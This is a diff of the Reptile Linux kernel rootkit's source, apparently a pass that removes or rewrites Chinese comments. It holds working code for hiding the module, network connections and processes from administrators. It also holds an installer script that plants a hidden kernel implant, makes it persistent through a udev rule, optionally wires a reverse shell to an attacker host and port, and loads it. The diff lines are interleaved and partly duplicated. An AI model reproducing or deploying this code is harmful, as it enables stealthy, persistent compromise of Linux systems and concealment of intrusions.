+	while (!mutex_trylock(&module_mutex))
-    while (!mutex_trylock(&module_mutex))
+		cpu_relax();
-        cpu_relax();
+	list_add(&THIS_MODULE->list, mod_list);
-    // 判断模块是否隐藏，并设置模块可见标志
+	mutex_unlock(&module_mutex);
-    if(flag_show_m == 0 && flag_hide_m == 1)
+	
-    {
+	hide_m = 0;
        flag_show_m = 1;
        flag_hide_m = 0;
        // 将模块重新添加到模块列表中
        list_add(&THIS_MODULE->list, mod_list);
        // 释放模块互斥锁
        mutex_unlock(&module_mutex);
    }
 }
 void hide_module(void)
 {
-    // 如果模块当前可见，则隐藏模块
+    if (hide_m == 0)
    if (flag_hide_m == 0 && flag_show_m == 1)
        hide();
-    // 如果模块当前隐藏，则显示模块
+    else if (hide_m == 1)
    else if (flag_hide_m == 1 && flag_show_m == 0)
        show();
-}
+}
--- a/src/Reptile/kernel/network.c
+++ b/src/Reptile/kernel/network.c
@ -1,92 +1,79 @@
-#include <linux/version.h> // 包含内核版本相关的头文件
+//网络地址隐藏
-#include <linux/inet.h> // 包含网络地址转换相关的头文件
+#include <linux/version.h>
-#include <linux/netlink.h> // 包含Netlink相关的头文件
+#include <linux/inet.h>
-#include <linux/inet_diag.h> // 包含网络诊断相关的头文件
+#include <linux/netlink.h>
 #include <linux/inet_diag.h>
-#include "network.h" // 包含自定义的network.h头文件
+#include "network.h"
-#include "string_helpers.h" // 包含自定义的string_helpers.h头文件
+#include "string_helpers.h"
 // 添加一个隐藏的网络连接
 void network_hide_add(struct sockaddr_in addr)
 {
-	struct hidden_conn *hc; // 定义一个指向hidden_conn结构体的指针
+    struct hidden_conn *hc;
-	hc = kmalloc(sizeof(*hc), GFP_KERNEL); // 分配内核内存
+    hc = kmalloc(sizeof(*hc), GFP_KERNEL);
-	if (!hc) // 如果内存分配失败
+	if (!hc)
-		return; // 直接返回
+	    return;
-	hc->addr = addr; // 将传入的地址赋值给hidden_conn结构体的addr成员
+	hc->addr = addr;
-	list_add(&hc->list, &hidden_conn_list); // 将hidden_conn结构体添加到隐藏连接列表中
+    list_add(&hc->list, &hidden_conn_list);
 }
 // 移除一个隐藏的网络连接
 void network_hide_remove(struct sockaddr_in addr)
 {
-	struct hidden_conn *hc; // 定义一个指向hidden_conn结构体的指针
+    struct hidden_conn *hc;
-	list_for_each_entry(hc, &hidden_conn_list, list) // 遍历隐藏连接列表
+    list_for_each_entry(hc, &hidden_conn_list, list)
 	{
-		if (addr.sin_addr.s_addr == hc->addr.sin_addr.s_addr) { // 如果找到匹配的地址
+		if (addr.sin_addr.s_addr == hc->addr.sin_addr.s_addr) {
-				list_del(&hc->list); // 从列表中删除该节点
+				list_del(&hc->list);
-				kfree(hc); // 释放内存
+				kfree(hc);
-				break; // 退出循环
+				break;
 		}
 	}
 }
 void network_hide_cleanup(void)
 {
 	struct hidden_conn *hc;
 	list_for_each_entry(hc, &hidden_conn_list, list)
 	{
 		list_del(&hc->list);
 		kfree(hc);
 	}
 }
 // 检查一个地址是否被隐藏
 int is_addr_hidden(struct sockaddr_in addr)
 {
-	struct hidden_conn *hc; // 定义一个指向hidden_conn结构体的指针
+    struct hidden_conn *hc;
-	list_for_each_entry(hc, &hidden_conn_list, list) // 遍历隐藏连接列表
+    list_for_each_entry(hc, &hidden_conn_list, list)
 	{
-		if (addr.sin_addr.s_addr == hc->addr.sin_addr.s_addr) // 如果找到匹配的地址
+		if (addr.sin_addr.s_addr == hc->addr.sin_addr.s_addr)
-			return 1; // 返回1，表示地址被隐藏
+			return 1;
 	}
-	return 0; // 返回0，表示地址未被隐藏
+	return 0;
 }
 /*
 unsigned int _inet4_pton(char *src)
 {
-	unsigned int dst; // 定义一个无符号整数用于存储转换后的地址
+    unsigned int dst;
-	int srclen = strlen(src); // 获取源字符串的长度
+	int srclen = strlen(src);
-	if (srclen > INET_ADDRSTRLEN) // 如果源字符串长度超过最大地址长度
+	if (srclen > INET_ADDRSTRLEN)
-		return -EINVAL; // 返回无效参数错误
+		return -EINVAL;
-	if (in4_pton(src, srclen, (u8 *)&dst, -1, NULL) == 0) // 将字符串转换为网络地址
+	if (in4_pton(src, srclen, (u8 *)&dst, -1, NULL) == 0)
-		return -EINVAL; // 如果转换失败，返回无效参数错误
+		return -EINVAL;
-	return dst; // 返回转换后的地址
+	return dst;
 }
 void hide_conn(char *ip_str)
 {
-	unsigned int ip; // 定义一个无符号整数用于存储IP地址
+	unsigned int ip;
-	struct sockaddr_in addr; // 定义一个sockaddr_in结构体用于存储地址
+	struct sockaddr_in addr;
-	if ((ip = _inet4_pton(ip_str)) > 0) { // 将字符串转换为IP地址
+	if ((ip = _inet4_pton(ip_str)) > 0) {
-		addr.sin_addr.s_addr = ip; // 将IP地址赋值给sockaddr_in结构体的地址成员
+		addr.sin_addr.s_addr = ip;
-		if (is_addr_hidden(addr)) // 如果地址已经被隐藏
+		if (is_addr_hidden(addr))
-			network_hide_remove(addr); // 移除隐藏的地址
+			network_hide_remove(addr);
 		else
-			network_hide_add(addr); // 添加隐藏的地址
+			network_hide_add(addr);
 	}
 }
 */
--- a/src/Reptile/kernel/proc.c
+++ b/src/Reptile/kernel/proc.c
@ -1,137 +1,133 @@
-#include <linux/version.h> // 包含内核版本相关的头文件
+//进程隐藏
-#include <linux/uaccess.h> // 包含用户空间访问相关的头文件
+#include <linux/version.h>
-#include <linux/ctype.h> // 包含字符类型判断相关的头文件
+#include <linux/uaccess.h>
-#include <linux/slab.h> // 包含内核内存分配相关的头文件
+#include <linux/ctype.h>
-#include <linux/namei.h> // 包含文件路径相关的头文件
+#include <linux/slab.h>
-#include <linux/limits.h> // 包含系统限制相关的头文件
+#include <linux/namei.h>
 #include <linux/limits.h>
 #if LINUX_VERSION_CODE >= KERNEL_VERSION(4, 11, 0)
-#	include <linux/sched/signal.h> // 包含调度和信号相关的头文件（内核版本4.11及以上）
+#	include <linux/sched/signal.h>
 #endif
 #if LINUX_VERSION_CODE < KERNEL_VERSION(4, 2, 0)
-#	include "string_helpers.h" // 包含字符串辅助函数（内核版本4.2以下）
+#	include "string_helpers.h"
 #endif
-#include "proc.h" // 包含自定义的proc.h头文件
+#include "proc.h"
-
+//根据给定的进程ID (pid) 和标志位设置 (set) 来修改进程及其线程的标志位
 // 设置或清除任务的标志
 int flag_tasks(pid_t pid, int set)
 {
-	int ret = 0; // 返回值初始化为0
+	int ret = 0;
-	struct pid *p; // 定义pid结构体指针
+	struct pid *p;
-	rcu_read_lock(); // 获取RCU读锁
+	rcu_read_lock();
-	p = find_get_pid(pid); // 根据pid获取pid结构体
+	p = find_get_pid(pid);
 	if (p) {
-		struct task_struct *task = get_pid_task(p, PIDTYPE_PID); // 获取任务结构体
+		struct task_struct *task = get_pid_task(p, PIDTYPE_PID);
 		if (task) {
 #if LINUX_VERSION_CODE >= KERNEL_VERSION(3, 14, 0)
 			struct task_struct *t = NULL;
-			for_each_thread(task, t) // 遍历任务的所有线程
+			for_each_thread(task, t)
 			{
 				if (set)
-					t->flags |= FLAG; // 设置标志
+					t->flags |= FLAG;
 				else
-					t->flags &= ~FLAG; // 清除标志
+					t->flags &= ~FLAG;
-				ret++; // 计数
+				ret++;
 			}
 #endif
 			if (set)
-				task->flags |= FLAG; // 设置标志
+				task->flags |= FLAG;
 			else
-				task->flags &= ~FLAG; // 清除标志
+				task->flags &= ~FLAG;
-			put_task_struct(task); // 释放任务结构体
+			put_task_struct(task);
 		}
-		put_pid(p); // 释放pid结构体
+		put_pid(p);
 	}
-	rcu_read_unlock(); // 释放RCU读锁
+	rcu_read_unlock();
-	return ret; // 返回设置或清除标志的任务数
+	return ret;
 }
 // 根据pid查找任务
 struct task_struct *find_task(pid_t pid)
 {
-	struct task_struct *p = current; // 当前任务
+	struct task_struct *p = current;
-	struct task_struct *ret = NULL; // 返回值初始化为NULL
+	struct task_struct *ret = NULL;
-	rcu_read_lock(); // 获取RCU读锁
+	rcu_read_lock();
-	for_each_process(p) // 遍历所有进程
+	for_each_process(p)
 	{
-		if (p->pid == pid) { // 如果找到匹配的pid
+		if (p->pid == pid) {
-			get_task_struct(p); // 获取任务结构体
+			get_task_struct(p);
-			ret = p; // 设置返回值
+			ret = p;
 		}
 	}
-	rcu_read_unlock(); // 释放RCU读锁
+	rcu_read_unlock();
-	return ret; // 返回找到的任务结构体
+	return ret;
 }
-
+//判断指定进程号进程是否可见
 // 判断进程是否不可见
 int is_proc_invisible(pid_t pid)
 {
-	struct task_struct *task; // 定义任务结构体指针
+	struct task_struct *task;
-	int ret = 0; // 返回值初始化为0
+	int ret = 0;
-	if (!pid) // 如果pid为0
+	if (!pid)
-		return ret; // 返回0
+		return ret;
-	task = find_task(pid); // 查找任务
+	task = find_task(pid);
-	if (!task) // 如果没有找到任务
+	if (!task)
-		return ret; // 返回0
+		return ret;
-	if (is_task_invisible(task)) // 判断任务是否不可见
+	if (is_task_invisible(task))
-		ret = 1; // 设置返回值为1
+		ret = 1;
-	put_task_struct(task); // 释放任务结构体
+	put_task_struct(task);
-	return ret; // 返回结果
+	return ret;
 }
-
+//解析文件名->pid -> is_proc_invisible(pid)
 // 判断/proc目录下的进程是否不可见
 int is_proc_invisible_2(const char __user *filename)
 {
-	int ret = 0, i, argc, is_num = 1; // 初始化变量
+	int ret = 0, i, argc, is_num = 1;
-	pid_t pid = 0; // 初始化pid
+	pid_t pid = 0;
-	char **a; // 定义字符指针数组
+	char **a;
-	char *name = kmalloc(PATH_MAX, GFP_KERNEL); // 分配内核内存
+	char *name = kmalloc(PATH_MAX, GFP_KERNEL);
-	if (strncpy_from_user(name, filename, PATH_MAX) > 0) { // 从用户空间复制字符串
+	if (strncpy_from_user(name, filename, PATH_MAX) > 0) {
-		if (strncmp(name, "/proc/", 6) == 0) { // 判断是否以/proc/开头
+		if (strncmp(name, "/proc/", 6) == 0) {
-			strreplace(name, '/', ' '); // 替换斜杠为空格
+			strreplace(name, '/', ' ');
-			a = argv_split(GFP_KERNEL, name, &argc); // 分割字符串
+			a = argv_split(GFP_KERNEL, name, &argc);
-			for (i = 0; i < strlen(a[1]); i++) { // 遍历字符串
+			for (i = 0; i < strlen(a[1]); i++) {
-				if (!isdigit(*a[1])) // 判断是否为数字
+				if (!isdigit(*a[1]))
-					is_num = 0; // 设置为非数字
+					is_num = 0;
 			}
 			if (is_num) {			
-				if (kstrtoint(a[1], 10, &pid) == 0) { // 将字符串转换为整数
+				if (kstrtoint(a[1], 10, &pid) == 0) {
-					if (is_proc_invisible(pid)) // 判断进程是否不可见
+					if (is_proc_invisible(pid))
-						ret = 1; // 设置返回值为1
+						ret = 1;
 				}
 			}
-			argv_free(a); // 释放字符指针数组
+			argv_free(a);
 		}
 	}
-	kfree(name); // 释放内存
+	kfree(name);
-	return ret; // 返回结果
+	return ret;
 }
 // 隐藏进程
 void hide_proc(pid_t pid)
 {
-	if (is_proc_invisible(pid)) // 判断进程是否不可见
+	if (is_proc_invisible(pid))
-		flag_tasks(pid, 0); // 清除标志
+		flag_tasks(pid, 0);
 	else
-		flag_tasks(pid, 1); // 设置标志
+		flag_tasks(pid, 1);
 }
 /*
--- a/src/Reptile/kernel/string_helpers.c
+++ b/src/Reptile/kernel/string_helpers.c
@ -1,34 +1,32 @@
-#include "string_helpers.h" // 包含头文件
+//获取命令行参数，转为可打印的字符
 #include "string_helpers.h"
-#if LINUX_VERSION_CODE < KERNEL_VERSION(4, 7, 0) // 如果内核版本小于4.7.0
+#if LINUX_VERSION_CODE < KERNEL_VERSION(4, 7, 0)
 /* stolen from lib/string_helpers.c */
-#include <linux/slab.h> // 包含内核内存分配头文件
+#include <linux/slab.h>
-#include <linux/ctype.h> // 包含字符类型处理头文件
+#include <linux/ctype.h>
-// 定义各种转义标志
+#define ESCAPE_SPACE		0x01
-#define ESCAPE_SPACE        0x01
+#define ESCAPE_SPECIAL		0x02
-#define ESCAPE_SPECIAL      0x02
+#define ESCAPE_NULL		    0x04
-#define ESCAPE_NULL         0x04
+#define ESCAPE_OCTAL		0x08
-#define ESCAPE_OCTAL        0x08
+#define ESCAPE_ANY		    (ESCAPE_SPACE | ESCAPE_OCTAL | ESCAPE_SPECIAL | ESCAPE_NULL)
-#define ESCAPE_ANY          (ESCAPE_SPACE | ESCAPE_OCTAL | ESCAPE_SPECIAL | ESCAPE_NULL)
+#define ESCAPE_NP		    0x10
-#define ESCAPE_NP           0x10
+#define ESCAPE_ANY_NP		(ESCAPE_ANY | ESCAPE_NP)
-#define ESCAPE_ANY_NP       (ESCAPE_ANY | ESCAPE_NP)
+#define ESCAPE_HEX		    0x20
 #define ESCAPE_HEX          0x20
 // 处理直接通过字符
 static bool escape_passthrough(unsigned char c, char **dst, char *end)
 {
 	char *out = *dst;
 	if (out < end)
-		*out = c; // 直接复制字符
+		*out = c;
 	*dst = out + 1;
 	return true;
 }
 // 处理空白字符转义
 static bool escape_space(unsigned char c, char **dst, char *end)
 {
 	char *out = *dst;
@ -36,36 +34,35 @@ static bool escape_space(unsigned char c, char **dst, char *end)
 	switch (c) {
 	case '\n':
-		to = 'n'; // 换行符转义为 \n
+		to = 'n';
 		break;
 	case '\r':
-		to = 'r'; // 回车符转义为 \r
+		to = 'r';
 		break;
 	case '\t':
-		to = 't'; // 制表符转义为 \t
+		to = 't';
 		break;
 	case '\v':
-		to = 'v'; // 垂直制表符转义为 \v
+		to = 'v';
 		break;
 	case '\f':
-		to = 'f'; // 换页符转义为 \f
+		to = 'f';
 		break;
 	default:
-		return false; // 不是空白字符
+		return false;
 	}
 	if (out < end)
-		*out = '\\'; // 添加转义符
+		*out = '\\';
 	++out;
 	if (out < end)
-		*out = to; // 添加转义后的字符
+		*out = to;
 	++out;
 	*dst = out;
 	return true;
 }
 // 处理特殊字符转义
 static bool escape_special(unsigned char c, char **dst, char *end)
 {
 	char *out = *dst;
@ -73,95 +70,91 @@ static bool escape_special(unsigned char c, char **dst, char *end)
 	switch (c) {
 	case '\\':
-		to = '\\'; // 反斜杠转义为 \\
+		to = '\\';
 		break;
 	case '\a':
-		to = 'a'; // 响铃符转义为 \a
+		to = 'a';
 		break;
 	case '\e':
-		to = 'e'; // 转义符转义为 \e
+		to = 'e';
 		break;
 	default:
-		return false; // 不是特殊字符
+		return false;
 	}
 	if (out < end)
-		*out = '\\'; // 添加转义符
+		*out = '\\';
 	++out;
 	if (out < end)
-		*out = to; // 添加转义后的字符
+		*out = to;
 	++out;
 	*dst = out;
 	return true;
 }
 // 处理空字符转义
 static bool escape_null(unsigned char c, char **dst, char *end)
 {
 	char *out = *dst;
 	if (c)
-		return false; // 不是空字符
+		return false;
 	if (out < end)
-		*out = '\\'; // 添加转义符
+		*out = '\\';
 	++out;
 	if (out < end)
-		*out = '0'; // 添加转义后的字符
+		*out = '0';
 	++out;
 	*dst = out;
 	return true;
 }
 // 处理八进制字符转义
 static bool escape_octal(unsigned char c, char **dst, char *end)
 {
 	char *out = *dst;
 	if (out < end)
-		*out = '\\'; // 添加转义符
+		*out = '\\';
 	++out;
 	if (out < end)
-		*out = ((c >> 6) & 0x07) + '0'; // 添加八进制字符的高三位
+		*out = ((c >> 6) & 0x07) + '0';
 	++out;
 	if (out < end)
-		*out = ((c >> 3) & 0x07) + '0'; // 添加八进制字符的中三位
+		*out = ((c >> 3) & 0x07) + '0';
 	++out;
 	if (out < end)
-		*out = ((c >> 0) & 0x07) + '0'; // 添加八进制字符的低三位
+		*out = ((c >> 0) & 0x07) + '0';
 	++out;
 	*dst = out;
 	return true;
 }
 // 处理十六进制字符转义
 static bool escape_hex(unsigned char c, char **dst, char *end)
 {
 	char *out = *dst;
 	if (out < end)
-		*out = '\\'; // 添加转义符
+		*out = '\\';
 	++out;
 	if (out < end)
-		*out = 'x'; // 添加十六进制标识符
+		*out = 'x';
 	++out;
 	if (out < end)
-		*out = hex_asc_hi(c); // 添加十六进制字符的高四位
+		*out = hex_asc_hi(c);
 	++out;
 	if (out < end)
-		*out = hex_asc_lo(c); // 添加十六进制字符的低四位
+		*out = hex_asc_lo(c);
 	++out;
 	*dst = out;
 	return true;
 }
 // 将字符串中的字符进行转义处理
 int string_escape_mem(const char *src, size_t isz, char *dst, size_t osz,
-			  unsigned int flags, const char *only)
+		      unsigned int flags, const char *only)
 {
 	char *p = dst;
 	char *end = p + osz;
@ -171,15 +164,19 @@ int string_escape_mem(const char *src, size_t isz, char *dst, size_t osz,
 		unsigned char c = *src++;
 		/*
-		 * 按以下顺序应用规则:
+		 * Apply rules in the following sequence:
-		 *	- 当 @flags 设置了 %ESCAPE_NP 位时，字符是可打印的
+		 *	- the character is printable, when @flags has
-		 *	- 提供了 @only 字符串且不包含当前字符
+		 *	  %ESCAPE_NP bit set
-		 *	- 字符不属于由给定 @flags 定义的符号类
+		 *	- the @only string is supplied and does not contain a
-		 * 在这些情况下，我们直接将字符传递到输出缓冲区。
+		 *	  character under question
 		 *	- the character doesn't fall into a class of symbols
 		 *	  defined by given @flags
 		 * In these cases we just pass through a character to the
 		 * output buffer.
 		 */
 		if ((flags & ESCAPE_NP && isprint(c)) ||
-			(is_dict && !strchr(only, c))) {
+		    (is_dict && !strchr(only, c))) {
-			/* 不做任何处理 */
+			/* do nothing */
 		} else {
 			if (flags & ESCAPE_SPACE && escape_space(c, &p, end))
 				continue;
@ -190,7 +187,7 @@ int string_escape_mem(const char *src, size_t isz, char *dst, size_t osz,
 			if (flags & ESCAPE_NULL && escape_null(c, &p, end))
 				continue;
-			/* ESCAPE_OCTAL 和 ESCAPE_HEX 总是最后处理 */
+			/* ESCAPE_OCTAL and ESCAPE_HEX always go last */
 			if (flags & ESCAPE_OCTAL && escape_octal(c, &p, end))
 				continue;
@ -198,13 +195,12 @@ int string_escape_mem(const char *src, size_t isz, char *dst, size_t osz,
 				continue;
 		}
-		escape_passthrough(c, &p, end); // 直接通过字符
+		escape_passthrough(c, &p, end);
 	}
-	return p - dst; // 返回处理后的字符串长度
+	return p - dst;
 }
 // 复制并转义字符串
 char *kstrdup_quotable(const char *src, gfp_t gfp)
 {
 	size_t slen, dlen;
@ -216,54 +212,52 @@ char *kstrdup_quotable(const char *src, gfp_t gfp)
 		return NULL;
 	slen = strlen(src);
-	dlen = string_escape_mem(src, slen, NULL, 0, flags, esc); // 计算转义后的长度
+	dlen = string_escape_mem(src, slen, NULL, 0, flags, esc);
-	dst = kmalloc(dlen + 1, gfp); // 分配内存
+	dst = kmalloc(dlen + 1, gfp);
 	if (!dst)
 		return NULL;
-	WARN_ON(string_escape_mem(src, slen, dst, dlen, flags, esc) != dlen); // 转义字符串
+	WARN_ON(string_escape_mem(src, slen, dst, dlen, flags, esc) != dlen);
-	dst[dlen] = '\0'; // 添加字符串结束符
+	dst[dlen] = '\0';
 	return dst;
 }
 #include "util.h"
 // 复制并转义命令行字符串
 char *kstrdup_quotable_cmdline(struct task_struct *task, gfp_t gfp)
 {
 	char *buffer, *quoted;
 	int i, res;
-	buffer = kmalloc(PAGE_SIZE, GFP_KERNEL); // 分配内存
+	buffer = kmalloc(PAGE_SIZE, GFP_KERNEL);
 	if (!buffer)
 		return NULL;
-	res = get_cmdline(task, buffer, PAGE_SIZE - 1); // 获取命令行
+	res = get_cmdline(task, buffer, PAGE_SIZE - 1);
-	buffer[res] = '\0'; // 添加字符串结束符
+	buffer[res] = '\0';
-	/* 折叠尾随的 NULL，保留 res 指向最后一个非 NULL。 */
+	/* Collapse trailing NULLs, leave res pointing to last non-NULL. */
 	while (--res >= 0 && buffer[res] == '\0')
 		;
-	/* 替换参数之间的 NULL。 */
+	/* Replace inter-argument NULLs. */
 	for (i = 0; i <= res; i++)
 		if (buffer[i] == '\0')
 			buffer[i] = ' ';
-	/* 确保结果是可打印的。 */
+	/* Make sure result is printable. */
-	quoted = kstrdup_quotable(buffer, gfp); // 转义字符串
+	quoted = kstrdup_quotable(buffer, gfp);
-	kfree(buffer); // 释放内存
+	kfree(buffer);
 	return quoted;
 }
 #if LINUX_VERSION_CODE < KERNEL_VERSION(4, 2, 0)
 // 替换字符串中的字符
 char *strreplace(char *s, char old, char new)
 {
 	for (; *s; ++s)
 		if (*s == old)
-			*s = new; // 替换字符
+			*s = new;
 	return s;
 }
--- a/src/Reptile/kernel/util.c
+++ b/src/Reptile/kernel/util.c
@ -1,120 +1,116 @@
-#include <linux/kmod.h> // 包含内核模块相关的头文件
+//访问和操作进程的命令行参数
-#include <linux/kallsyms.h> // 包含内核符号表相关的头文件
+#include <linux/kmod.h>
-#include <linux/types.h> // 包含内核类型定义的头文件
+#include <linux/kallsyms.h>
-#include <linux/slab.h> // 包含内核内存分配相关的头文件
+#include <linux/types.h>
-#include <linux/mm.h> // 包含内存管理相关的头文件
+#include <linux/slab.h>
-#include <linux/sched.h> // 包含调度相关的头文件
+#include <linux/mm.h>
-#include <linux/version.h> // 包含内核版本相关的头文件
+#include <linux/sched.h>
-#include <linux/ctype.h> // 包含字符类型相关的头文件
+#include <linux/version.h>
 #include <linux/ctype.h>
 #if LINUX_VERSION_CODE >= KERNEL_VERSION(4, 11, 0)
-# include <linux/sched/mm.h> // 包含调度和内存管理相关的头文件（仅在内核版本4.11.0及以上）
+# include <linux/sched/mm.h>
 #endif
-#include "util.h" // 包含自定义的util头文件
+#include "util.h"
 // 声明一个函数指针，用于访问进程虚拟内存
 asmlinkage int (*_access_process_vm)(struct task_struct *, unsigned long, void *, int, int);
 int util_init(void)
 {
 #if LINUX_VERSION_CODE >= KERNEL_VERSION(4, 11, 0)
-	// 在内核版本4.11.0及以上，直接使用access_process_vm函数
+    _access_process_vm = (void *) access_process_vm;
 	_access_process_vm = (void *) access_process_vm;
 #else
 	// 在内核版本4.11.0以下，通过符号表查找access_process_vm函数
 	_access_process_vm = (void *) ksym_lookup_name("access_process_vm");
 #endif
-	// 如果函数指针为空，返回错误
+    if (!_access_process_vm)
 	if (!_access_process_vm)
 		return -EFAULT;
-	return 0; // 初始化成功，返回0
+    return 0;
 }
-/* 从mm/util.c文件中借用的函数 */
+/* stolen from mm/util.c */
 // 获取进程的命令行参数
 int get_cmdline(struct task_struct *task, char *buffer, int buflen)
 {
-	int res = 0; // 初始化返回值
+	int res = 0;
-	unsigned int len; // 命令行参数的长度
+	unsigned int len;
-	struct mm_struct *mm = get_task_mm(task); // 获取进程的内存描述符
+	struct mm_struct *mm = get_task_mm(task);
-	unsigned long arg_start, arg_end, env_start, env_end; // 命令行参数和环境变量的起始和结束地址
+	unsigned long arg_start, arg_end, env_start, env_end;
-
+	if (!mm)
 	if (!mm) // 如果内存描述符为空，跳转到out标签
 		goto out;
-	if (!mm->arg_end) // 如果命令行参数的结束地址为空，跳转到out_mm标签
+	if (!mm->arg_end)
 		goto out_mm;
-	down_read(&mm->mmap_sem); // 获取内存描述符的读锁
+	down_read(&mm->mmap_sem);
-	arg_start = mm->arg_start; // 获取命令行参数的起始地址
+	arg_start = mm->arg_start;
-	arg_end = mm->arg_end; // 获取命令行参数的结束地址
+	arg_end = mm->arg_end;
-	env_start = mm->env_start; // 获取环境变量的起始地址
+	env_start = mm->env_start;
-	env_end = mm->env_end; // 获取环境变量的结束地址
+	env_end = mm->env_end;
-	up_read(&mm->mmap_sem); // 释放内存描述符的读锁
+	up_read(&mm->mmap_sem);
-	len = arg_end - arg_start; // 计算命令行参数的长度
+	len = arg_end - arg_start;
-	if (len > buflen) // 如果长度大于缓冲区长度，截断长度
+	if (len > buflen)
 		len = buflen;
 	// 读取进程的命令行参数到缓冲区
 	res = _access_process_vm(task, arg_start, buffer, len, FOLL_FORCE);
-	// 如果命令行参数的末尾被覆盖，假设应用程序使用了setproctitle(3)
+	/*
 	 * If the nul at the end of args has been overwritten, then
 	 * assume application is using setproctitle(3).
 	 */
 	if (res > 0 && buffer[res-1] != '\0' && len < buflen) {
-		len = strnlen(buffer, res); // 获取缓冲区的实际长度
+		len = strnlen(buffer, res);
 		if (len < res) {
-			res = len; // 更新返回值
+			res = len;
 		} else {
-			len = env_end - env_start; // 计算环境变量的长度
+			len = env_end - env_start;
-			if (len > buflen - res) // 如果长度大于剩余缓冲区长度，截断长度
+			if (len > buflen - res)
 				len = buflen - res;
 			// 读取进程的环境变量到缓冲区
 			res += _access_process_vm(task, env_start, buffer+res, len, FOLL_FORCE);
-			res = strnlen(buffer, res); // 获取缓冲区的实际长度
+			res = strnlen(buffer, res);
 		}
 	}
 out_mm:
-	mmput(mm); // 释放内存描述符
+	mmput(mm);
 out:
-	return res; // 返回读取的长度
+	return res;
 }
 /*
 static int count_argc(const char *str)
 {
-	int count = 0; // 初始化参数计数
+	int count = 0;
-	bool was_space; // 标记上一个字符是否为空格
+	bool was_space;
 	for (was_space = true; *str; str++) {
-		if (isspace(*str)) { // 如果当前字符为空格
+		if (isspace(*str)) {
-			was_space = true; // 更新标记
+			was_space = true;
-		} else if (was_space) { // 如果当前字符不是空格且上一个字符为空格
+		} else if (was_space) {
-			was_space = false; // 更新标记
+			was_space = false;
-			count++; // 增加参数计数
+			count++;
 		}
 	}
-	return count; // 返回参数计数
+	return count;
 }
 int run_cmd(const char *cmd)
 {
-	char **argv; // 参数数组
+	char **argv;
-	int ret; // 返回值
+	int ret;
-	int i; // 循环变量
+	int i;
-	argv = argv_split(GFP_KERNEL, cmd, NULL); // 分割命令行参数
+	argv = argv_split(GFP_KERNEL, cmd, NULL);
 	if (argv) {
-		ret = exec(argv); // 执行命令
+		ret = exec(argv);
-		argv_free(argv); // 释放参数数组
+		argv_free(argv);
 	} else {
-		ret = -ENOMEM; // 内存分配失败，返回错误
+		ret = -ENOMEM;
 	}
-	return ret; // 返回执行结果
+	return ret;
 }
 */
--- a/src/Reptile/scripts/installer.sh
+++ b/src/Reptile/scripts/installer.sh
@ -0,0 +1,65 @@
 #!/bin/bash
 function random_gen_dec {
 	RETVAL=$(shuf -i 50-99 -n 1)
 }
 PWD="$(cd "$(dirname ${BASH_SOURCE[0]})" && pwd)"
 [ $? -ne 0 ] && PWD="$(cd "$(dirname $0)" && pwd)"
 source "${BASH_SOURCE%/*}/../.config" || \
 { echo "Error: no .config file found!"; exit; }
 UDEV_DIR=/lib/udev
 random_gen_dec && NAME=$RETVAL-$HIDE.rules
 RULE=/lib/udev/rules.d/$NAME
 [ ! -d /lib/udev/rules.d ] && RULE=/etc/udev/rules.d/$NAME
 # Create Reptile's folder
 mkdir -p /$HIDE && \
 # Copy "cmd" binary
 cp $PWD/../output/cmd /$HIDE/$HIDE"_cmd" && \
 # Copy "shell" binary
 cp $PWD/../output/shell /$HIDE/$HIDE"_shell" && \
 # Copy "bashrc"
 cp $PWD/../scripts/bashrc /$HIDE/$HIDE"_rc" && \
 # Create start script
 cp $PWD/../scripts/start /$HIDE/$HIDE"_start" && \
 sed -i s!XXXXX!$TAG_NAME! /$HIDE/$HIDE"_start" && \
 sed -i s!\#CMD!/$HIDE/$HIDE"_cmd"! /$HIDE/$HIDE"_start" && \
 if [ "$CONFIG_RSHELL_ON_START" == "y" ]; then
 	sed -i s!\#SHELL!/$HIDE/$HIDE"_shell"! /$HIDE/$HIDE"_start" && \
 	sed -i s!LHOST!$LHOST! /$HIDE/$HIDE"_start" && \
 	sed -i s!LPORT!$LPORT! /$HIDE/$HIDE"_start" && \
 	sed -i s!PASS!$PASSWORD! /$HIDE/$HIDE"_start" && \
 	sed -i s!INTERVAL!$INTERVAL! /$HIDE/$HIDE"_start" && \
 	true || false;
 fi
 # Permissions
 chmod 777 /$HIDE/* && \
 # Copy kernel implant
 cp $PWD/../output/reptile /$HIDE/$HIDE && \
 # Make persistent
 cp $PWD/../output/reptile $UDEV_DIR/$HIDE && \
 cp $PWD/../scripts/rule $RULE && \
 # cleaning output dir
 rm -rf $PWD/../output && \
 # Load Reptile
 /$HIDE/$HIDE && \
 echo -e "\n\e[44;01;33m*** DONE! ***\e[00m\n" || { echo -e "\e[01;31mERROR!\e[00m\n"; exit; }
 # How to Uninstall
 echo -e "UNINSTALL:\n"
 echo -e "/$HIDE/$HIDE""_cmd show"
 echo -e "rmmod reptile_module"
 echo -e "rm -rf /$HIDE $RULE $UDEV_DIR/$HIDE"
 echo
--- a/src/Reptile/scripts/kconfig/conf.c
+++ b/src/Reptile/scripts/kconfig/conf.c
@ -3,306 +3,265 @@
 * Released under the terms of the GNU GPL v2.0.
 */
-#include <locale.h>      // 引入本地化相关功能的头文件
+#include <locale.h>
-#include <ctype.h>       // 引入字符处理函数的头文件，例如 isspace、isdigit 等
+#include <ctype.h>
-#include <stdio.h>       // 引入标准输入输出库
+#include <stdio.h>
-#include <stdlib.h>      // 引入标准库，提供内存管理、程序退出等功能
+#include <stdlib.h>
-#include <string.h>      // 引入字符串处理函数库
+#include <string.h>
-#include <time.h>        // 引入时间日期相关函数
+#include <time.h>
-#include <unistd.h>      // 引入 Unix 系统 API，提供与系统交互的功能
+#include <unistd.h>
-#include <getopt.h>      // 引入命令行参数解析函数
+#include <getopt.h>
-#include <sys/stat.h>    // 引入文件状态函数
+#include <sys/stat.h>
-#include <sys/time.h>    // 引入时间管理函数
+#include <sys/time.h>
-#include <errno.h>       // 引入错误码定义
+#include <errno.h>
-#include "lkc.h"         // 引入项目自定义的头文件
+
-
+#include "lkc.h"
-// 函数声明
+
-static void conf(struct menu *menu);                // 配置函数
+static void conf(struct menu *menu);
-static void check_conf(struct menu *menu);          // 检查配置函数
+static void check_conf(struct menu *menu);
-static void xfgets(char *str, int size, FILE *in);  // 自定义的 fgets 函数
+static void xfgets(char *str, int size, FILE *in);
-
+
 // 定义输入模式枚举类型
 enum input_mode {
-    oldaskconfig,       // 用户交互模式
+	oldaskconfig,
-    silentoldconfig,    // 无用户交互模式，使用默认值
+	silentoldconfig,
-    oldconfig,          // 使用旧的配置
+	oldconfig,
-    allnoconfig,        // 所有选项都为 no
+	allnoconfig,
